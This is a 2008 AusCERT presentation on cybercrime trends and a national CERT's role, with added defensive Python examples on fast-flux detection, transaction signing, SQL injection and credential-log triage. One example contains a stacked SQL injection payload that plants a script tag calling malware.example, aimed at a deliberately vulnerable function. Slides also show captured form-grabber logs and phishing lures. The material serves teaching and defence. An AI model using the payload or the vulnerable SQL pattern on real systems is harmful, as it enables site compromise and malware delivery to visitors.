
Online threats and trends and the role of a CERT

PacINET 2008
Kathryn Kerr, AusCERT

Copyright © 2008 AusCERT

Outline

• Introduction
• Online threats and trends
  – What’s at risk
  – Attack trends
• What does AusCERT do?
  – Role of the national CERT
• Ideas for building capability

What’s at risk? Confidentiality: health records via the web

• At risk – integrity and confidentiality
• For example, the NSW government Health-e-link
  – http://www.healthelink.nsw.gov.au/additional_resources/?a=53559#7
• Single-factor authentication over web-based SSL
• Adheres to privacy principles and has measures to protect the security of the Health-e-link servers and database
• But none of these counter-measures protects against commonplace attacks directed at client PCs, which may capture online transactions, including form data sent or received via SSL sessions

What’s at risk? Availability

• Access to your country’s online systems and services
• Example – Estonia is a small country but highly dependent on its online systems
  – 100% use e-government
  – 99% use online banking
  – 86% online taxes
• The Estonian DDoS attacks lasted for 3 weeks (May 2007)
  – Targeted government and commercial systems
  – Attacks politically motivated but with financial and social impacts
• CERT Estonia played a significant role coordinating the response to defend against and mitigate these attacks
  – Sought assistance from experts around the world (including ISPs, CERT communities, network and infosec communities)
  – Developing lessons-learned reports

The threat and motivation

• Since 2003 – the cybercrime economy started with phishing
• Criminals are actively targeting e-commerce and e-government services
• Motivation is money – illicit financial gain
• Many types of cybercrime
  – Identity theft features prominently
• Returns are high – risk is low
• Common attacks are directed at:
  – Client PCs (home and work)
  – Web applications/servers


Evolution of the threat

• Botnets are the criminals’ “killer app” (Swiss army knife)
  – Hosting malware sites
  – Hosting phishing sites
  – Advertisement click fraud
  – Sending out spam
  – For rent/sale
  – DDoS attacks
• Fast-flux domains (using fraudulently registered domains)
• Complex and resilient communication structures
• Self-defending, e.g. the Storm P2P botnet

Fast flux domains

(Diagram slide: no text.)
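Added example, not from the slides or from AusCERT: a small Python heuristic for spotting fast-flux behaviour from repeated A-record lookups of the same name. The lookups are constructed (RFC 5737 documentation addresses, invented .test names), the /24 prefix stands in for an AS lookup, and the thresholds are illustrative assumptions; a production check would use ASN data and many more lookups over a longer window.

```python
from collections import defaultdict
from statistics import mean

# Constructed sample (not real DNS data): successive A-record lookups of three
# names by one resolver.  Tuple: (name, TTL in seconds, addresses returned).
OBSERVATIONS = [
    ("shop-example.test", 3600, ["203.0.113.10", "203.0.113.11"]),
    ("shop-example.test", 3600, ["203.0.113.10", "203.0.113.11"]),
    ("shop-example.test", 3600, ["203.0.113.11", "203.0.113.10"]),
    ("pharm-deal.test", 180, ["198.51.100.7", "192.0.2.44", "203.0.113.201"]),
    ("pharm-deal.test", 180, ["192.0.2.91", "198.51.100.130", "203.0.113.55"]),
    ("pharm-deal.test", 120, ["192.0.2.17", "198.51.100.200", "203.0.113.99"]),
    ("cdn-like.test", 60, ["192.0.2.5", "192.0.2.6"]),
    ("cdn-like.test", 60, ["192.0.2.7", "192.0.2.8"]),
    ("cdn-like.test", 60, ["192.0.2.5", "192.0.2.9"]),
]


def network_of(ip):
    # Assumption: the /24 prefix stands in for an AS lookup.  A flux network
    # answers from bots in many unrelated networks; a CDN answers from its own.
    return ip.rsplit(".", 1)[0]


def profile(observations):
    """Aggregate what the resolver saw for each name across all lookups."""
    per = defaultdict(lambda: {"ips": set(), "nets": set(), "ttls": [], "lookups": 0})
    for name, ttl, ips in observations:
        p = per[name]
        p["lookups"] += 1
        p["ttls"].append(ttl)
        p["ips"].update(ips)
        p["nets"].update(network_of(ip) for ip in ips)
    return per


def flux_score(p):
    """Illustrative score: distinct addresses plus doubly weighted distinct
    networks per lookup, doubled again when TTLs are short enough to rotate
    the answer set between two visits by the same victim."""
    ttl_factor = 2.0 if mean(p["ttls"]) <= 300 else 1.0
    return ttl_factor * (len(p["ips"]) + 2 * len(p["nets"])) / p["lookups"]


def classify(observations, max_ttl=300, min_ips=5, min_nets=3):
    """Flag a name as fast-flux only when all three signals agree: short TTL,
    many distinct addresses, and those addresses spread over several networks.
    The last condition is what keeps a low-TTL CDN name from being flagged."""
    verdicts = {}
    for name, p in profile(observations).items():
        avg_ttl = mean(p["ttls"])
        verdicts[name] = {
            "fast_flux": avg_ttl <= max_ttl
            and len(p["ips"]) >= min_ips
            and len(p["nets"]) >= min_nets,
            "distinct_ips": len(p["ips"]),
            "networks": len(p["nets"]),
            "mean_ttl": avg_ttl,
            "score": round(flux_score(p), 2),
        }
    return verdicts


if __name__ == "__main__":
    for name, v in classify(OBSERVATIONS).items():
        print(f"{name:20} flux={v['fast_flux']!s:5} ips={v['distinct_ips']:2} "
              f"nets={v['networks']} ttl={v['mean_ttl']} score={v['score']}")
```

The CDN-like name is the caveat worth keeping in mind: low TTLs and a changing address set on their own are normal for legitimate content networks, so it is the spread across unrelated networks (in practice, autonomous systems) that separates a flux network from a CDN.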

Sophisticated malware functionality

• Ability to defeat various forms of two-factor authentication
  – Ability to initiate transactions in the background during the authenticated session, after the legitimate user has authenticated
• Ability to defeat SSL digital certificates by using HTML injection while retaining the connection to the legitimate site with its legitimate digital certificate
• Ability to modify browser-stored root certificates
• Ability to access all information on the computer, including protected store data (passwords) and soft certificates
• Ability to hide itself (rootkits) and disable or bypass security counter-measures
• Ability of the attacker to control hundreds of thousands of computers simultaneously via the malware
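The first point above (a transaction started in the background once the user has authenticated) and the countermeasure the e-government slide later mentions (transaction signing on a device other than the untrusted PC), as an added Python sketch that is not from the slides or from AusCERT. The bank, token, account and payee names are invented; the token models a separate signing device that shares a per-user HMAC key with the bank, and the per-transfer one-time challenge is an assumption added to block replay.

```python
import hashlib
import hmac
import secrets


class SigningToken:
    """Stand-in for a separate signing device (assumption: it shares a per-user
    HMAC key with the bank).  The user reads payee and amount on the device
    and it signs exactly those values together with a one-time challenge."""

    def __init__(self, secret: bytes):
        self._secret = secret

    def sign(self, challenge: str, payee: str, amount_cents: int) -> str:
        msg = f"{challenge}|{payee}|{amount_cents}".encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()


class Bank:
    """Minimal bank back end: sessions, per-session challenges, a ledger."""

    def __init__(self):
        self._secrets = {}     # user -> token key
        self._sessions = {}    # session id -> user
        self._challenges = {}  # session id -> unused challenge
        self.ledger = []

    def enrol(self, user: str) -> SigningToken:
        secret = secrets.token_bytes(32)
        self._secrets[user] = secret
        return SigningToken(secret)

    def login(self, user: str) -> str:
        # Password and any login-time second factor are assumed to have
        # passed; from here on the session cookie is all the browser needs,
        # which is exactly what session-riding malware relies on.
        sid = secrets.token_hex(16)
        self._sessions[sid] = user
        return sid

    def challenge(self, sid: str) -> str:
        c = secrets.token_hex(8)
        self._challenges[sid] = c
        return c

    def transfer(self, sid, payee, amount_cents, challenge, mac) -> bool:
        user = self._sessions.get(sid)
        if user is None or self._challenges.get(sid) != challenge:
            return False  # no live session, or a stale/replayed challenge
        expected = SigningToken(self._secrets[user]).sign(challenge, payee, amount_cents)
        if not hmac.compare_digest(expected, mac or ""):
            return False  # details differ from what the user actually signed
        del self._challenges[sid]  # one transfer per challenge
        self.ledger.append((user, payee, amount_cents))
        return True


def run_scenarios():
    """Replays the slide's attacks against a signing-protected transfer.
    Every request rides the same authenticated session."""
    bank = Bank()
    token = bank.enrol("alice")
    sid = bank.login("alice")

    # 1. Legitimate: the user checks payee and amount on the token and signs.
    c1 = bank.challenge(sid)
    mac1 = token.sign(c1, "electricity-co", 12000)
    legitimate = bank.transfer(sid, "electricity-co", 12000, c1, mac1)

    # 2. Man-in-the-browser swaps the payee after the user has signed.
    c2 = bank.challenge(sid)
    mac2 = token.sign(c2, "electricity-co", 12000)
    payee_swapped = bank.transfer(sid, "mule-account", 12000, c2, mac2)

    # 3. Malware starts its own transfer in the live session, no token involved.
    c3 = bank.challenge(sid)
    background = bank.transfer(sid, "mule-account", 99900, c3, None)

    # 4. Malware replays the user's first, valid challenge and MAC.
    replay = bank.transfer(sid, "electricity-co", 12000, c1, mac1)

    return {
        "legitimate": legitimate,
        "payee_swapped": payee_swapped,
        "background_transfer": background,
        "replay": replay,
        "ledger": bank.ledger,
    }


if __name__ == "__main__":
    for k, v in run_scenarios().items():
        print(f"{k}: {v}")
```

What this buys and what it does not: the malware on the client still sees every page and every value the user types, so confidentiality is lost either way; only the integrity of the transfer survives, which is the distinction the e-government slide draws between banking and services where confidentiality is the main goal.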

Trojans

Logging behaviour

Tsunami Trojan: infections and logging
(Chart: logging-site hits, 0 to 12,000, against date/time from 19/11/2004 to 19/12/2004; series “Data logged” and “Trojan infections”.)


Captured credentials and web sessions

(Diagram: spam → user clicks on the link → visits the legitimate website with username & password; the credentials and session are captured.) Spam subject lines used as lures:
“Your order #[number] has been accepted for the amount 865.00 AUD”
“Act of terrorism at The Opening Ceremony of the ATHENS 2004 Olympic Games”
"Current Australia's Prime Minister survived a near attack"
“Osama Found Hanged”
“George Bush sniper-rifle shot!”
“Huge ocean wave!” - http://www.tsunamidanger.com
“I sent Sent You an E-Card From AOL E-Cards powered by BlueMountainCards.com.au”
“SENSATION! It's happened again! White house orgie!”

E-government security challenges

• Security of e-government transactions depends on the security of the entire channel
  – The channel includes the remote client PCs that connect to those systems
  – For all personal information accessed or submitted online
• In the event of remote system compromise, technology exists to protect the integrity of financial transactions (e.g. online banking)
  – E.g. transaction signing performed off the untrusted device
• For compromised remote client systems there is no way to protect the confidentiality of those transactions
  – For e-government services confidentiality is the paramount security goal
• Assume the remote client PC is compromised when developing your risk management strategy

ID theft malware 1

https://online.NatLloyds.co.uk/logon.ibc
14/12/2004 14:24:16
form=theform;type=text; UserId1=xxxxxxxx
form=theform;type=password; Password=txxxxxxxxle
URL=https://online.NatLloyds.co.uk/logon.ibc
To log on enter your User ID and Password.
………...
Please enter characters 1, 2 and 6 from your Memorable Information
1 a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9
2 a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9
6 a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9
Forgotten your Memorable Information?
<!>https://online.NatLloyds.co.uk/logon.ibc
14/12/2004 14:24:27
form=theForm;type=select-one; ResponseValue0=g
form=theForm;type=select-one; ResponseValue1=a
form=theForm;type=select-one; ResponseValue2=r

ID theft malware 3

URL=https://www.ir_online.gov.uk/irsa2/RenderEngine?eForms_timestamp=1104501920101
This site is compatible with assistive technology. Skip to the top menu including help, save and close. Skip to the menu on the left. Skip to the first paragraph or entry box on this page.
Online Tax Return - Self Assessment
Mr XXXX XXXXXXXX Tax Return: 2003/2004
Main Form (SA100) Welcome
My Details | Form(s) Selection | Employment | Self-employment | Partnership | Land & Property | Main Form

ID theft malware 4

Message 14 of 2898
From: XXXXXXX
To: XXXXXX
Subject: RE: VPN Connections
Sent Date: XXXXXXX
Received Date: XXXXXXX

No Problem XXXXX. If you do have any troubles please don't hesitate to call.

Best wishes,
XXX

-----Original Message-----
From: XXXXX
Sent: XXXX
To: XXXX
Subject: Re: VPN Connections

XXX, after having no luck for some days - I've just got through..... Sorry for wasting your time, XXXX

ID theft malware 5

Mail | Directory | Return To Portal | Preferences | Logout | Help
Copyright © 1998, 2004, XXXXX. All rights reserved.
[1]<>https://www.XXXX.com/ frame=1 form=Logon i_1=XXXXXXX[pwd] frame=1 form=Logon i_2=XXXXX
URL=https://www.XXXX.com/
Employee Guide | XXX Homepage | XXXXX Opportunities | XXXCar | XXXUser | Career Management | Internal Training
Welcome to your personal view and data on XXXX's HR database. Logon here to view your Select Flexible Benefits system or access your Personal Documents.
[1]< >https://www.xxxx.com/ 12/31/2004 11:29:41 AM frame=1 form=Logon i_1=xxxxxx[pwd] frame=1 form=Logon i_2=xxxxxxxxx

Web app vulnerabilities

• Many cyber attacks are hosted on compromised web sites
• A variety of attack mechanisms are used to compromise a web site and serve malware to visitors to the site
• No need for spam to direct visitors to the site
• Rather than scanning, specific vulnerabilities are searched for (e.g. using Google) and then exploited
  – Attacks are often automated – bulk compromises

Overt web defacement – before
(Screenshot slide.)

Now – covert compromise
(Screenshot slide.)

Locating vulnerable web pages
(Screenshot slide.)

SQL injection using ASProx malware

• Active Server Pages (ASP) is Microsoft’s implementation of server-side scripting
• ASProx conducts automated Google searches for .asp web pages and launches SQL injection attacks against them
• If successful, it injects a malicious script tag which attempts to install malware on visitors’ PCs
• AusCERT is monitoring .au domains compromised by ASProx
• Between 24 June 2008 and 17 July 2008, 98 .au domains were compromised
• Purpose: to create bots

ASProx SQL injection
(Screenshot slide.)
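Added example, not the slides' or AusCERT's code and not the ASProx payload itself: the string-concatenation pattern that this class of attack exploits, beside the validated and parameterised form, plus a scan for injected script tags across every text column, which is the check a site owner can run after such a compromise. It uses Python with sqlite3; executescript() stands in for a database driver that accepts stacked statements as SQL Server does, and the payload, table names and script URL are constructed placeholders.

```python
import sqlite3

# Constructed stacked-query payload of the general shape such automated
# attacks deliver in a query-string parameter; the script URL is a placeholder.
PAYLOAD = ("1); UPDATE products SET description = description || "
           "'<script src=\"http://malware.example/x.js\"></script>'; --")


def fresh_db():
    """In-memory stand-in for the site's product database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        CREATE TABLE views(product_id INTEGER, seen_at TEXT DEFAULT CURRENT_TIMESTAMP);
        INSERT INTO products(name, description)
            VALUES ('Widget', 'A fine widget'), ('Gadget', 'A handy gadget');
    """)
    return conn


def record_view_vulnerable(conn, item_id: str) -> int:
    """Classic-ASP pattern: SQL assembled by string concatenation from the
    query string.  executescript() models a driver and database that accept
    stacked statements, as SQL Server does (sqlite's execute() would refuse)."""
    conn.executescript(f"INSERT INTO views(product_id) VALUES ({item_id});")
    return conn.execute("SELECT COUNT(*) FROM views").fetchone()[0]


def record_view_hardened(conn, item_id: str) -> int:
    """Validate the input against what it must be, then bind it as a value
    so it can never be parsed as SQL."""
    if not item_id.isdigit():
        raise ValueError("product id must be an integer")
    conn.execute("INSERT INTO views(product_id) VALUES (?)", (int(item_id),))
    return conn.execute("SELECT COUNT(*) FROM views").fetchone()[0]


def find_injected_scripts(conn):
    """Scan every text column of every table for a script tag.
    Returns (table, column, rowid) for each hit."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:  # names come from the catalogue, not from users
        for _cid, col, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if not any(t in ctype.upper() for t in ("TEXT", "CHAR", "CLOB")):
                continue
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" WHERE "{col}" LIKE ? ORDER BY rowid',
                ("%<script%",))
            hits.extend((table, col, r[0]) for r in rows)
    return hits


def demo():
    """Same attacker request against both versions of the page."""
    vulnerable = fresh_db()
    record_view_vulnerable(vulnerable, PAYLOAD)
    hardened = fresh_db()
    try:
        record_view_hardened(hardened, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable_hits": find_injected_scripts(vulnerable),
        "hardened_rejected": rejected,
        "hardened_hits": find_injected_scripts(hardened),
    }


if __name__ == "__main__":
    print(demo())
```

Two things to take from this: the vulnerable page still works for ordinary requests, so the compromise is invisible to the site owner until someone looks at stored content (hence the scan), and the fix is not escaping but validating the type and binding the value, so there is no SQL left for the input to alter.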

About AusCERT

• Australia’s national CERT
  – Constituency – all Australian Internet users
  – 15 years of operation
• Independent and impartial
  – University-based, non-government
  – Self-funded and not-for-profit
• Primary point of contact for incidents affecting Australian networks
  – Analysis and advice about computer network threats and vulnerabilities
  – Incident response, coordination and mitigation

What is AusCERT doing?

– Monitoring and providing advice about threats, vulnerabilities and security management
– Incident response and mitigation assistance for current attacks
– Analysing malware to understand the nature of the threat and how to prevent and recover from the attack
– Building and maintaining links with national and international stakeholders vital for effective incident response

Attack detection and mitigation

• Detecting and providing advice about, e.g.
  – vulnerable DNS servers
  – vulnerable web servers
  – ASProx web compromises
  – compromised PII and credentials (log data)
• Compromised PII and credentials:
  – Sort and separate by domain
  – Then redistribute to the affected parties in Australia and around the world
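An added Python example, not from the slides or from AusCERT, showing the "sort and separate by domain" step above applied to log lines in the shape of the form-grabber output on the "ID theft malware" slides. The sample log is constructed (reserved .test and example hostnames, made-up values), the small two-label suffix table is a stand-in for the public suffix list, treating the "<!>" prefix as a second kind of URL marker is an assumption about the format, and the masking rule is an assumption about what a notification to the affected organisation should carry.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in the shape of the form-grabber output on the slides.
# Every hostname and value here is invented.
SAMPLE_LOG = """\
URL=https://online.bank-example.co.uk/logon.ibc
14/12/2004 14:24:16
form=theform;type=text; UserId1=u1234567
form=theform;type=password; Password=s3cretpass
To log on enter your User ID and Password.
<!>https://online.bank-example.co.uk/logon.ibc
14/12/2004 14:24:27
form=theForm;type=select-one; ResponseValue0=g
form=theForm;type=select-one; ResponseValue1=a
form=theForm;type=select-one; ResponseValue2=r
URL=https://www.tax-portal-example.gov.au/irsa2/RenderEngine
31/12/2004 09:02:11
form=Logon;type=text; i_1=taxuser
form=Logon;type=password; i_2=hunter2
URL=https://hr.corp-example.com/portal
31/12/2004 11:29:41
form=Logon;type=text; i_1=jsmith
form=Logon;type=password; i_2=Winter04
"""

URL_RE = re.compile(r"^(?:URL=|<!>)(https?://\S+)")
TIME_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}$")
FIELD_RE = re.compile(
    r"^form=(?P<form>[^;]+);type=(?P<type>[^;]+);\s*(?P<name>[^=]+)=(?P<value>.*)$")

# Assumption: a tiny stand-in for the public suffix list, enough for the sample.
TWO_LABEL_SUFFIXES = {"co.uk", "gov.uk", "ac.uk", "com.au", "gov.au", "net.au", "org.au"}
# Field types whose values are secrets (the memorable-information letters are
# select-one fields, so they count too).
SECRET_TYPES = {"password", "select-one"}


def registrable_domain(host: str) -> str:
    """The organisation-level name a notification should be routed on."""
    labels = host.lower().split(".")
    keep = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def mask(value: str, kind: str) -> str:
    """Secrets are removed outright; identifiers keep two leading characters
    so the receiving organisation can locate the account."""
    if kind in SECRET_TYPES or len(value) <= 2:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 2)


def parse_log(text: str):
    """Split grabber output into records: one per URL marker, carrying the
    following timestamp and form fields.  Captured page text is dropped."""
    records, current = [], None
    for line in text.splitlines():
        m = URL_RE.match(line)
        if m:
            current = {"url": m.group(1), "time": None, "fields": {}, "secret_fields": 0}
            records.append(current)
        elif current is None:
            continue
        elif TIME_RE.match(line):
            current["time"] = line
        elif (m := FIELD_RE.match(line)):
            current["fields"][m["name"]] = mask(m["value"], m["type"])
            if m["type"] in SECRET_TYPES:
                current["secret_fields"] += 1
    return records


def triage_by_domain(text: str):
    """Sort and separate by domain: one bundle per affected organisation."""
    buckets = defaultdict(list)
    for rec in parse_log(text):
        buckets[registrable_domain(urlsplit(rec["url"]).hostname)].append(rec)
    return dict(buckets)


def notification_summary(text: str):
    """Counts for the covering note: captured sessions and secret fields."""
    return {
        domain: {"sessions": len(recs),
                 "secret_fields": sum(r["secret_fields"] for r in recs)}
        for domain, recs in triage_by_domain(text).items()
    }


if __name__ == "__main__":
    for domain, recs in triage_by_domain(SAMPLE_LOG).items():
        print(domain, notification_summary(SAMPLE_LOG)[domain])
        for r in recs:
            print("  ", r["time"], r["url"], r["fields"])
```

The masking is deliberate: the party receiving the bundle needs enough to find and lock the account, not the secret itself, and the raw log should not travel further than it already has.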

What are the solutions?

• National e-security plans and arrangements, which include:
  – National or regional CERT capability
  – Capability for monitoring, analysing and reporting on cyber threats and vulnerabilities
  – Plans for dealing with DDoS attacks against critical online systems/services
  – Best-practice domain name registry policies
  – Adherence to effective Acceptable Use Policies by ISPs
  – Education and awareness-raising programs for government, business and end-users, and incentives for applying good security
  – Recognise the risks to e-government systems across the whole channel

What are the solutions?

• Internationally
  – Coordinated and cohesive cyber response capabilities
    • Among like sectors, law enforcement, CERTs, domain name registries, ISPs, ICT regulators, anti-virus vendors, product vendors
  – Current priorities require focus on:
    • Detecting and cleaning bots/botnets
    • Secure web programming to prevent legitimate sites being used to serve malware
    • Malware detection and analysis
    • Procedures to prevent and remove fraudulent domains
    • Building trusted (trustworthy, more secure) software

Model for national and international cooperation

(Diagram: the National CERT linked to the Finance Sector, Law Enforcement, Domain Registries and ISPs, with smaller FS, LE, CERT and ISP nodes for the international counterparts.)

Further information

• E-government risks
  – Managing risk associated with online ID theft for government and providers of e-government services, AusCERT, 2005, www.auscert.org.au
• Cybercrime and malware
  – OECD, Malicious software (malware) – a security threat to the internet economy, Ministerial Background Report, June 2008, available online
  – House of Lords, Personal Internet Security, Science and Technology Committee Report, Volume 1, 2007, available online
  – CERT/CC, Botnets as a vehicle for online crime, 2005, http://www.cert.org/archive/pdf/Botnets.pdf

Thank you. Questions?

[email protected]